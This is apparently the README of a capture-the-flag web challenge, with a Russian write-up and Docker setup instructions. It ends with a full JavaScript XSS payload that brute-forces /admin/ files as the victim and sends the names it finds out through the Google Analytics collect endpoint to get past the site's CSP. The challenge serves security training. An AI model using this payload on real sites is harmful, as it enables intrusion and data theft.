# web-hard

## Task
We want that you hack one pentesters company. Try to find theirs channel on the site
and retrieve the secret from there.

## Решение

Задание на XSS в форме контакта. Сложность в существовании CSP политики, которая уязвима
к возможности отправки данных через GOOGLE ANALITICS. Чтобы проэксплойтить XSS и найти канал 
предачи данных пентестеров, который является файлом, необходимо отправить XSS пэйлоад, который имеет
ограничение в 500 символов. Пэйлоад должен пробрутить файлы по словарю от имени жертвы
и найдя файл, отправить себе его имя через аналитику. Дальше вытащить его контент и также отправить 
контент себе. Также сложность в том, что из-за ограничения кол-ва символов, хакер не может взять с
собой словарь, и не может скачать его из-за CSP. Необходимо сделать запрос к первой старнице, разбить слова
в массив и пробрутить по этим словам.

Для эксплуатации работает бот, который раз в 20 секунд заглядывает на страницу и смотрит по 10ть пэйлоадов.

## Build

```sh
docker-compose build --force-rm
```

## Run

```sh
docker run -d --rm --name web-hard --env GMETRIC_ID: UA-000000000-1 --env RECAPTCHA_SECRET: 1 --env RECAPTCHA_PUBLIC: 0 --env FLAG: 123 -p 80:80 web-hard_web
docker run -d --rm --name web-hard_db web-hard_db
docker run -d --rm --name web-hard_bot web-hard_bot
```

## Deploy

Copy `docker-compose.yml` to the server and run:

```sh
docker-compose up -d
```

## Exploit

Brute files and find \`chanel\` with flag in less then 500 symbols with CSP bypass:

`fetch("/").then(function(t){return t.text()}).then(function(t){t.replace(/[\<\?\>\=\.\"\'\/\*\{\}\:\;\!\%\,\-\+\|\r\t\n\(\)\&\#]/gi," ").split(" ").filter(function(t,n,e){return e.indexOf(t)===n}).sort().forEach(function(n,t,e){fetch("/admin/"+n+".php").then(function(t){return t.text()}).then(function(t){-1===t.indexOf("404 Not Found")&&fetch("https://www.google-analytics.com/collect?v=1&tid=UA-0000000000-1&cid=0000000000&t=event&ec=email&ea="+n)})})});`